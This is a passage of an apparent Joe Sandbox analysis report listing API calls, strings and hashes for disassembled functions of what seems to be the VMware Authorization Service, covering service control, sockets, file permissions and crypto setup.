                                                    • GetLastError.KERNEL32(?,?,?,?,?,00000000), ref: 00ED5DA6
                                                    • Warning.VMWAREBASE(00000000,?,?,?,?,?,00000000), ref: 00ED5DB4
                                                    • GetTickCount.KERNEL32 ref: 00ED5DC2
                                                    • QueryServiceStatus.ADVAPI32(00000000,?,?,?,?,?,?,00000000), ref: 00ED5DD1
                                                    • GetTickCount.KERNEL32 ref: 00ED5DEC
                                                    • GetTickCount.KERNEL32 ref: 00ED5E04
                                                    • Sleep.KERNEL32(?,?,?,?,?,?,00000000), ref: 00ED5E43
                                                    • QueryServiceStatus.ADVAPI32(00000000,?,?,?,?,?,?,?,00000000), ref: 00ED5E4E
                                                    • GetLastError.KERNEL32(?,?,?,?,?,00000000), ref: 00ED5E58
                                                    • Warning.VMWAREBASE(00000000,?,?,?,?,?,00000000), ref: 00ED5E5F
                                                    • Warning.VMWAREBASE(?,?,QueryServiceStatus failed: %s (%d),00000000,00000000,?,?,?,?,?,00000000), ref: 00ED5E72
                                                    • Warning.VMWAREBASE(?,?,WaitForServiceStateChange failed: Timed out while waiting for service state to change from %d,?,?,?,?,?,?,00000000), ref: 00ED5EA9
                                                    Strings
                                                    • StartService(%s) failed: %s (%d), xrefs: 00ED5DBB
                                                    • VMAuthdStartService failed to lookup service tag: %s, xrefs: 00ED5CE3
                                                    • OpenService(%s) failed: %s (%d), xrefs: 00ED5D70
                                                    • QueryServiceStatus failed: %s (%d), xrefs: 00ED5E6B
                                                    • VMAuthdStartService failed to start service %s: Expected service state %d, got %d, xrefs: 00ED5E88
                                                    • WaitForServiceStateChange failed: Timed out while waiting for service state to change from %d, xrefs: 00ED5EA2
                                                    • OpenSCManager failed: %s (%d), xrefs: 00ED5D2C
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3857372619.0000000000ED1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00ED0000, based on PE: true
                                                    • Associated: 00000004.00000002.3857299596.0000000000ED0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3857443217.0000000000EDA000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3857522386.0000000000EE2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_ed0000_FilePost?a.jbxd
                                                    Similarity
                                                    • API ID: Warning$ErrorLast$CountServiceTick$QueryStatus$SleepStart
                                                    • String ID: OpenSCManager failed: %s (%d)$OpenService(%s) failed: %s (%d)$QueryServiceStatus failed: %s (%d)$StartService(%s) failed: %s (%d)$VMAuthdStartService failed to lookup service tag: %s$VMAuthdStartService failed to start service %s: Expected service state %d, got %d$WaitForServiceStateChange failed: Timed out while waiting for service state to change from %d
                                                    • API String ID: 91289074-1392791404
                                                    • Opcode ID: adf0ebe94e17e03b482a30d230d7195cbbbb75c327bb64ddb1c3701608d08f24
                                                    • Instruction ID: d032a52aad18f13cc9155599d65895bcd07b964e2cc6952b2d8a1f2837e8c111
                                                    • Opcode Fuzzy Hash: adf0ebe94e17e03b482a30d230d7195cbbbb75c327bb64ddb1c3701608d08f24
                                                    • Instruction Fuzzy Hash: B561F873A00205ABCB10ABA4AC85ABE77AAEB49304F64246BFD05B7351D631DD079B71
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00ED82D0 Relevance: 43.9, APIs: 15, Strings: 10, Instructions: 147COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • InitializeSecurityDescriptor.ADVAPI32(?,00000001,00000000,00ED81F3,00000000,?,?,?,?,?,?,?,?,00ED82B2), ref: 00ED8301
                                                    • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00001000,?,?,?,?,?,?,?,?,00ED82B2), ref: 00ED831A
                                                    • Warning.VMWAREBASE(%s: Successfully added access-allowed ACE to file's DACL.,TicketLimitFileAccess,?,?,?,?,?,?,?,?,?,?,?,00ED82B2), ref: 00ED8436
                                                    • FreeSid.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00ED82B2), ref: 00ED8446
                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00ED82B2), ref: 00ED8451
                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00ED82B2), ref: 00ED845B
                                                    Strings
                                                    • TicketLimitFileAccess, xrefs: 00ED8430
                                                    • %s: malloc error, xrefs: 00ED8329
                                                    • %s: SetFileSecurity error, xrefs: 00ED8422, 00ED8435
                                                    • %s: AddAccessAllowedAce: administator failed, xrefs: 00ED83AC
                                                    • %s: admininistrator SID is not valid., xrefs: 00ED838D
                                                    • %s: SetSecurityDescriptorDacl error, xrefs: 00ED83FB
                                                    • %s: Successfully added access-allowed ACE to file's DACL., xrefs: 00ED842B
                                                    • %s: AllocateAndInitializeSid() failed, xrefs: 00ED8376
                                                    • %s: InitializeSecurityDescriptor error, xrefs: 00ED830B
                                                    • %s: InitializeAcl error, xrefs: 00ED8345
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3857372619.0000000000ED1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00ED0000, based on PE: true
                                                    • Associated: 00000004.00000002.3857299596.0000000000ED0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3857443217.0000000000EDA000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3857522386.0000000000EE2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_ed0000_FilePost?a.jbxd
                                                    Similarity
                                                    • API ID: free$DescriptorFreeInitializeSecurityWarningmalloc
                                                    • String ID: %s: AddAccessAllowedAce: administator failed$%s: AllocateAndInitializeSid() failed$%s: InitializeAcl error$%s: InitializeSecurityDescriptor error$%s: SetFileSecurity error$%s: SetSecurityDescriptorDacl error$%s: Successfully added access-allowed ACE to file's DACL.$%s: admininistrator SID is not valid.$%s: malloc error$TicketLimitFileAccess
                                                    • API String ID: 2239919038-1491952532
                                                    • Opcode ID: 450be8c73ef0700c8963cf7a7a51b97a5cf1a1bbb82bb38328ad0a239a20731c
                                                    • Instruction ID: 82718f9b1581f07642c82b18b3df455221579ffffc001f4d0fd084e8c4a309f7
                                                    • Opcode Fuzzy Hash: 450be8c73ef0700c8963cf7a7a51b97a5cf1a1bbb82bb38328ad0a239a20731c
                                                    • Instruction Fuzzy Hash: 7C41D430A45204ABDB118B65AE4ABEE77A8EF14B44F046027F505F6380DB65DA068B66
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00ED5EE0 Relevance: 40.5, APIs: 15, Strings: 8, Instructions: 241networkstringCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • Warning.VMWAREBASE(?,?,00000000), ref: 00ED5F0B
                                                    • Warning.VMWAREBASE(00000000,00000000,00000000,?,?,00000000), ref: 00ED5F16
                                                    • strrchr.VCRUNTIME140(?,0000005C,00000000,00000000,00000000,?,?,00000000), ref: 00ED5F25
                                                    • memset.VCRUNTIME140(?,00000000,00000208), ref: 00ED5F8A
                                                    • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00ED5FB1
                                                    • GetLastError.KERNEL32 ref: 00ED5FBD
                                                    • WSCSetApplicationCategory.WS2_32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00ED5FF1
                                                    • WSCSetApplicationCategory.WS2_32(?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00ED6010
                                                    • Warning.VMWAREBASE(%s: WSCSetApplicationCategory succeeded: %#x,VMAuthdRunService,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00ED6024
                                                    • Warning.VMWAREBASE(%s: WSCSetApplicationCategory Failed: %d,VMAuthdRunService,00000000), ref: 00ED603B
                                                    • WSAStartup.WS2_32(00000002,?), ref: 00ED604C
                                                    • WSAGetLastError.WS2_32 ref: 00ED6057
                                                    • Warning.VMWAREBASE(No usable WinSock DLL. error: %d.,00000000), ref: 00ED6063
                                                    • StartServiceCtrlDispatcherW.ADVAPI32(VMAuthdService), ref: 00ED6084
                                                    • GetLastError.KERNEL32 ref: 00ED6092
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3857372619.0000000000ED1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00ED0000, based on PE: true
                                                    • Associated: 00000004.00000002.3857299596.0000000000ED0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3857443217.0000000000EDA000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3857522386.0000000000EE2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_ed0000_FilePost?a.jbxd
                                                    Similarity
                                                    • API ID: Warning$ErrorLast$ApplicationCategory$CtrlDispatcherFileModuleNameServiceStartStartupmemsetstrrchr
                                                    • String ID: %s: GetModuleFileNameW Failed: %d$%s: WSCSetApplicationCategory Failed: %d$%s: WSCSetApplicationCategory succeeded: %#x$No usable WinSock DLL. error: %d.$StartServiceCtrlDispatcher error = %d$VMAuthdRunService$VMAuthdService$authd.lspCategory
                                                    • API String ID: 3578263550-3683011569
                                                    • Opcode ID: 84df3d44d01732ee9664fee41d6c9b9f8feb88bc9e9ef68c76c212761946a2bd
                                                    • Instruction ID: 2cac2741d0113c154bd12b7bd36b2d2ef88d79828f2a4a7481093e1c6563cc3c
                                                    • Opcode Fuzzy Hash: 84df3d44d01732ee9664fee41d6c9b9f8feb88bc9e9ef68c76c212761946a2bd
                                                    • Instruction Fuzzy Hash: 7471E871B412056EDB30AB709C46BAA77E9DF15348F1420A7F949FB382EB319E06C751
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00ED4B50 Relevance: 36.9, APIs: 14, Strings: 7, Instructions: 144networkCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • socket.WS2_32(00000002,00000001,00000000), ref: 00ED4B9A
                                                    • setsockopt.WS2_32(00000000,0000FFFF,00000004,FFFFFFFF,00000004), ref: 00ED4BC6
                                                    • WSAGetLastError.WS2_32(?,?,?,?,00ED4575,00000014,00000001,?), ref: 00ED4BD1
                                                    • htonl.WS2_32(00000000), ref: 00ED4BF2
                                                    • htons.WS2_32(00000000), ref: 00ED4BFF
                                                    • bind.WS2_32(00000000,uE,00000010), ref: 00ED4C10
                                                    • WSAGetLastError.WS2_32(?,?,?,?,00ED4575,00000014,00000001,?), ref: 00ED4C35
                                                    • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,00ED4575,00000014,00000001,?), ref: 00ED4C55
                                                    • GetLastError.KERNEL32(?,?,?,?,00ED4575,00000014,00000001,?), ref: 00ED4C61
                                                      • Part of subcall function 00ED27C0: GetLastError.KERNEL32(?,?,00ED3B4C,00000005,%s(): writing to closed socket: %s.,VMAuthdSocketWrite,?,?,?,?), ref: 00ED27D8
                                                      • Part of subcall function 00ED27C0: Warning.VMWAREBASE(?,00001000,?,00000005,?,?,00ED3B4C,00000005,%s(): writing to closed socket: %s.,VMAuthdSocketWrite,?,?,?,?), ref: 00ED27F3
                                                      • Part of subcall function 00ED27C0: Warning.VMWAREBASE(?,00EDA850,?,?,00001000,?,00000005,?,?,00ED3B4C,00000005,%s(): writing to closed socket: %s.,VMAuthdSocketWrite,?), ref: 00ED2807
                                                      • Part of subcall function 00ED27C0: _printf.MSPDB140-MSVCRT ref: 00ED2824
                                                      • Part of subcall function 00ED27C0: SetLastError.KERNEL32(00000000,?,?,00ED3B4C,00000005,%s(): writing to closed socket: %s.,VMAuthdSocketWrite,?,?,?,?), ref: 00ED282D
                                                    • WSAEventSelect.WS2_32(00000000,00000000,00000008), ref: 00ED4C7D
                                                    • WSAGetLastError.WS2_32(?,?,?,?,00ED4575,00000014,00000001,?), ref: 00ED4C88
                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?,?,00ED4575,00000014,00000001,?), ref: 00ED4C9F
                                                    • closesocket.WS2_32(00000000), ref: 00ED4CB0
                                                    Strings
                                                    • Call to CreateEvent failed with error %d., xrefs: 00ED4C68
                                                    • WSAEventSelect failed with error %d., xrefs: 00ED4C8F
                                                    • Call to bind failed with error %d., xrefs: 00ED4C1B, 00ED4C3C
                                                    • Call to setsockopt failed with error %d., xrefs: 00ED4BD8
                                                    • uE, xrefs: 00ED4C09, 00ED4C0E
                                                    • Call to socket failed with error %d., xrefs: 00ED4BA7
                                                    • Call to listen failed with error %d., xrefs: 00ED4C30
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3857372619.0000000000ED1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00ED0000, based on PE: true
                                                    • Associated: 00000004.00000002.3857299596.0000000000ED0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3857443217.0000000000EDA000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3857522386.0000000000EE2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_ed0000_FilePost?a.jbxd
                                                    Similarity
                                                    • API ID: ErrorLast$EventWarning$CloseCreateHandleSelect_printfbindclosesockethtonlhtonssetsockoptsocket
                                                    • String ID: Call to CreateEvent failed with error %d.$Call to bind failed with error %d.$Call to listen failed with error %d.$Call to setsockopt failed with error %d.$Call to socket failed with error %d.$WSAEventSelect failed with error %d.$uE
                                                    • API String ID: 3009708719-1751584600
                                                    • Opcode ID: 28ce10956d62de98aeef792ca00c0b90ba69adf481e0ab977bca018c823a76b4
                                                    • Instruction ID: 12ce7b9b67e137a66bbaf076f0ed3c1b716ecbe6184d87851af21fc8726f2617
                                                    • Opcode Fuzzy Hash: 28ce10956d62de98aeef792ca00c0b90ba69adf481e0ab977bca018c823a76b4
                                                    • Instruction Fuzzy Hash: 3641D8B0A02204AFEB109F75AC46BADB7A4EF25725F141227FA24FB3D1D77049068752
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00ED3360 Relevance: 33.4, APIs: 11, Strings: 8, Instructions: 176COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • Warning.VMWAREBASE(%s: Pathname too long: %s,VMAuthdPermissionsCheck,00000000,?,?,?,00ED2584,00000000,?,?,00000000,00000000,?,?), ref: 00ED338F
                                                    • Warning.VMWAREBASE(?,00000000,00000104,00000000,00000000,?,?,?,00ED2584,00000000,?,?,00000000,00000000,?,?), ref: 00ED33CE
                                                    • ImpersonateLoggedOnUser.ADVAPI32(?,00000000,?,?), ref: 00ED33E3
                                                    • GetLastError.KERNEL32 ref: 00ED33ED
                                                      • Part of subcall function 00ED27C0: GetLastError.KERNEL32(?,?,00ED3B4C,00000005,%s(): writing to closed socket: %s.,VMAuthdSocketWrite,?,?,?,?), ref: 00ED27D8
                                                      • Part of subcall function 00ED27C0: Warning.VMWAREBASE(?,00001000,?,00000005,?,?,00ED3B4C,00000005,%s(): writing to closed socket: %s.,VMAuthdSocketWrite,?,?,?,?), ref: 00ED27F3
                                                      • Part of subcall function 00ED27C0: Warning.VMWAREBASE(?,00EDA850,?,?,00001000,?,00000005,?,?,00ED3B4C,00000005,%s(): writing to closed socket: %s.,VMAuthdSocketWrite,?), ref: 00ED2807
                                                      • Part of subcall function 00ED27C0: _printf.MSPDB140-MSVCRT ref: 00ED2824
                                                      • Part of subcall function 00ED27C0: SetLastError.KERNEL32(00000000,?,?,00ED3B4C,00000005,%s(): writing to closed socket: %s.,VMAuthdSocketWrite,?,?,?,?), ref: 00ED282D
                                                    • Warning.VMWAREBASE(?,00000000,00000000,?,?), ref: 00ED3428
                                                    • ImpersonateLoggedOnUser.ADVAPI32(?,?,?,00000000,?,?), ref: 00ED344D
                                                    • GetLastError.KERNEL32(?,?,00000000,?,?), ref: 00ED3457
                                                    • Warning.VMWAREBASE(00000000,00120089,?,?,?,00000000,?,?), ref: 00ED3479
                                                    • ImpersonateLoggedOnUser.ADVAPI32(?), ref: 00ED34C6
                                                    • GetLastError.KERNEL32 ref: 00ED34D0
                                                    • Warning.VMWAREBASE(00000000,001200A0,?), ref: 00ED34F2
                                                      • Part of subcall function 00ED6EA0: RevertToSelf.ADVAPI32(00ED35D3,?,?,?,?,?,?,?,ha-nfcssl), ref: 00ED6E80
                                                    Strings
                                                    • You need execute access in order to connect with the %s. Access denied for config file: %s, xrefs: 00ED3513
                                                    • You need read access in order to connect with the %s. Access denied for config file: %s, xrefs: 00ED349A
                                                    • VMAuthdPermissionsCheck, xrefs: 00ED3385
                                                    • %s: Pathname too long: %s, xrefs: 00ED338A
                                                    • Config file not found: %s, xrefs: 00ED3404
                                                    • VMware Server Console, xrefs: 00ED3495, 00ED350E
                                                    • Invalid pathname (too long), xrefs: 00ED3394
                                                    • Failed to impersonate logged on user (error %d)., xrefs: 00ED33F4, 00ED345E, 00ED34D7
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3857372619.0000000000ED1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00ED0000, based on PE: true
                                                    • Associated: 00000004.00000002.3857299596.0000000000ED0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3857443217.0000000000EDA000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3857522386.0000000000EE2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_ed0000_FilePost?a.jbxd
                                                    Similarity
                                                    • API ID: Warning$ErrorLast$ImpersonateLoggedUser$RevertSelf_printf
                                                    • String ID: %s: Pathname too long: %s$Config file not found: %s$Failed to impersonate logged on user (error %d).$Invalid pathname (too long)$VMAuthdPermissionsCheck$VMware Server Console$You need execute access in order to connect with the %s. Access denied for config file: %s$You need read access in order to connect with the %s. Access denied for config file: %s
                                                    • API String ID: 3502866025-2643214048
                                                    • Opcode ID: 2cf85f0a67b92fd27bf20cc9d7ac127b964ba1fd3f19f531a99d3a3450a1fbeb
                                                    • Instruction ID: d16cfa5de6aa8f4f992835dc6804f93e500434ee8c9712c07b3270d1802b9e68
                                                    • Opcode Fuzzy Hash: 2cf85f0a67b92fd27bf20cc9d7ac127b964ba1fd3f19f531a99d3a3450a1fbeb
                                                    • Instruction Fuzzy Hash: 88412C71A463107AD6215B747C06FAABB58CF52B19F04229BFD24763C2E6528B0741E7
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00ED1FB0 Relevance: 31.6, APIs: 12, Strings: 6, Instructions: 99stringCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • Warning.VMWAREBASE(00000000), ref: 00ED1FC5
                                                    • strrchr.VCRUNTIME140(00000000,0000005C), ref: 00ED1FD6
                                                    • Warning.VMWAREBASE(?,?,%s%c..%c%s,00000000,0000005C,0000005C,vmware-vmx.exe), ref: 00ED1FF9
                                                    • Warning.VMWAREBASE(?,00000004,?,?,%s%c..%c%s,00000000,0000005C,0000005C,vmware-vmx.exe), ref: 00ED2001
                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 00ED200E
                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 00ED2022
                                                    • Warning.VMWAREBASE(vmware-vmx-stats.exe), ref: 00ED204A
                                                    • Warning.VMWAREBASE(00000000,vmware-vmx-stats.exe), ref: 00ED2052
                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 00ED205F
                                                    • Warning.VMWAREBASE(vmware-vmx-stats.exe), ref: 00ED2066
                                                    • strncpy.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000,?), ref: 00ED207A
                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 00ED2081
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3857372619.0000000000ED1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00ED0000, based on PE: true
                                                    • Associated: 00000004.00000002.3857299596.0000000000ED0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3857443217.0000000000EDA000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3857522386.0000000000EE2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_ed0000_FilePost?a.jbxd
                                                    Similarity
                                                    • API ID: Warning$free$strncpystrrchr
                                                    • String ID: %s%c..%c%s$NOT_IMPLEMENTED %s:%d$bora\apps\vmauthd\vmauthd.c$vmware-vmx-debug.exe$vmware-vmx-stats.exe$vmware-vmx.exe
                                                    • API String ID: 1596469099-3787913377
                                                    • Opcode ID: 538332a67b4f14d848f8fe5683dab8f1d83aa02758387f645df1a72c42ddf25d
                                                    • Instruction ID: 1cde52fe4ac365d032dc8e7ea7da993a0cc2895962eee450181ed0d2effe51f2
                                                    • Opcode Fuzzy Hash: 538332a67b4f14d848f8fe5683dab8f1d83aa02758387f645df1a72c42ddf25d
                                                    • Instruction Fuzzy Hash: F321FBA1544340AFEB2126756DC6B6F3B58CF95755F08202BFB147A383E76A8A078372
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00ED3F80 Relevance: 29.8, APIs: 8, Strings: 9, Instructions: 79stringCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • strstr.VCRUNTIME140(?,.exe,00000001), ref: 00ED3FAF
                                                    • Warning.VMWAREBASE(?,00000104,%s.exe,?), ref: 00ED3FCD
                                                    • Warning.VMWAREBASE(?), ref: 00ED3FDC
                                                    • _printf.MSPDB140-MSVCRT ref: 00ED3FF4
                                                    • Warning.VMWAREBASE(?,VMAuthdService,VMware Authorization Service,Authorization and authentication service for starting and accessing virtual machines,00000000,00000000,%s,00000000), ref: 00ED4014
                                                    • _printf.MSPDB140-MSVCRT ref: 00ED4042
                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 00ED404B
                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 00ED4057
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3857372619.0000000000ED1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00ED0000, based on PE: true
                                                    • Associated: 00000004.00000002.3857299596.0000000000ED0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3857443217.0000000000EDA000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3857522386.0000000000EE2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_ed0000_FilePost?a.jbxd
                                                    Similarity
                                                    • API ID: Warning$_printffree$strstr
                                                    • String ID: %s$%s.exe$.exe$Authorization and authentication service for starting and accessing virtual machines$Could not find path to service %s.$Successfully registered %s.$Successfully unregistered %s.$VMAuthdService$VMware Authorization Service
                                                    • API String ID: 4064233335-4157764946
                                                    • Opcode ID: 66022724001ee702ef18de900077c0c7e587a6846fafd1ff0f0fb8c0bcf59cca
                                                    • Instruction ID: 3bda02d4959b264b4065f6ad371040db5cdd269c511f9d215e798a56abd74989
                                                    • Opcode Fuzzy Hash: 66022724001ee702ef18de900077c0c7e587a6846fafd1ff0f0fb8c0bcf59cca
                                                    • Instruction Fuzzy Hash: DF21D871A4131977CB206B609C06EDE37A4CF61B45F102197FA0872381DBB55F878EE2
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 6CF61910 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 123encryptionCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000,69F2C272,?,00000000,6CF54435), ref: 6CF61955
                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,6CF9D77D,000000FF,?,6CF61FA0), ref: 6CF6195B
                                                    • CryptAcquireContextA.ADVAPI32(?,Crypto++ RNG,00000000,00000001,00000008), ref: 6CF6196F
                                                    • CryptAcquireContextA.ADVAPI32(?,Crypto++ RNG,00000000,00000001,00000028), ref: 6CF61980
                                                    • SetLastError.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,6CF9D77D,000000FF), ref: 6CF619A5
                                                    • ___std_exception_copy.LIBVCRUNTIME ref: 6CF61A22
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3858261632.000000006CF51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CF50000, based on PE: true
                                                    • Associated: 00000004.00000002.3858217155.000000006CF50000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858354479.000000006CF9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858354479.000000006CFBA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858482466.000000006CFD7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858527942.000000006CFD8000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858568373.000000006CFD9000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858568373.000000006CFDB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858663344.000000006CFDC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_6cf50000_FilePost?a.jbxd
                                                    Similarity
                                                    • API ID: AcquireContextCrypt$ErrorLast$___std_exception_copy
                                                    • String ID: CryptAcquireContext$Crypto++ RNG
                                                    • API String ID: 616088579-1159690233
                                                    • Opcode ID: d17227e22834550a59e6743765f2546566082b438a84febae6be856012391bde
                                                    • Instruction ID: 8c6a319b3e6b87ceb3526524161ed84d1f2c9a1bc3cdd5c3a9df003f9a05edc7
                                                    • Opcode Fuzzy Hash: d17227e22834550a59e6743765f2546566082b438a84febae6be856012391bde
                                                    • Instruction Fuzzy Hash: D041B572A14609ABDB10DF95CC41FDAF7FCEB09714F10462AF512E7A80EBB5A504CB60
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00ED2480 Relevance: 14.0, APIs: 1, Strings: 7, Instructions: 49COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • Warning.VMWAREBASE(00000002,?,0000001E,vmware-vmx-stats.exe,?,?,?,?,?,?,?,?,00ED225B), ref: 00ED24AE
                                                      • Part of subcall function 00ED3B70: Warning.VMWAREBASE(?,00000400,?,?), ref: 00ED3B96
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3857372619.0000000000ED1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00ED0000, based on PE: true
                                                    • Associated: 00000004.00000002.3857299596.0000000000ED0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3857443217.0000000000EDA000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3857522386.0000000000EE2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_ed0000_FilePost?a.jbxd
                                                    Similarity
                                                    • API ID: Warning
                                                    • String ID: %s Authentication Daemon Version %u.%u%s, %s, %s, %s, %s, %s$: SSL Required$NFCSSL supported/t$ServerDaemonProtocol:SOAP$VMware$["$vmware-vmx-stats.exe
                                                    • API String ID: 2415109466-128753137
                                                    • Opcode ID: fbd433447adee4564bd3cc7d1f49de4a0956453b8957bed4bb281caf00312146
                                                    • Instruction ID: a877600fb87cb7e3acc9ebfedd693343ab37089c4b759591ade3a4ceeb14f59d
                                                    • Opcode Fuzzy Hash: fbd433447adee4564bd3cc7d1f49de4a0956453b8957bed4bb281caf00312146
                                                    • Instruction Fuzzy Hash: A4017171780348AFEB18D7648D93FBA73E8D745700F08207BB901FB381D961AE469626
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00ED8F80 Relevance: 9.1, APIs: 6, Instructions: 73COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00ED8F8C
                                                    • memset.VCRUNTIME140(?,00000000,00000003), ref: 00ED8FB2
                                                    • memset.VCRUNTIME140(?,00000000,00000050), ref: 00ED903C
                                                    • IsDebuggerPresent.KERNEL32 ref: 00ED9058
                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00ED9078
                                                    • UnhandledExceptionFilter.KERNEL32(?), ref: 00ED9082
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3857372619.0000000000ED1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00ED0000, based on PE: true
                                                    • Associated: 00000004.00000002.3857299596.0000000000ED0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3857443217.0000000000EDA000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3857522386.0000000000EE2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_ed0000_FilePost?a.jbxd
                                                    Similarity
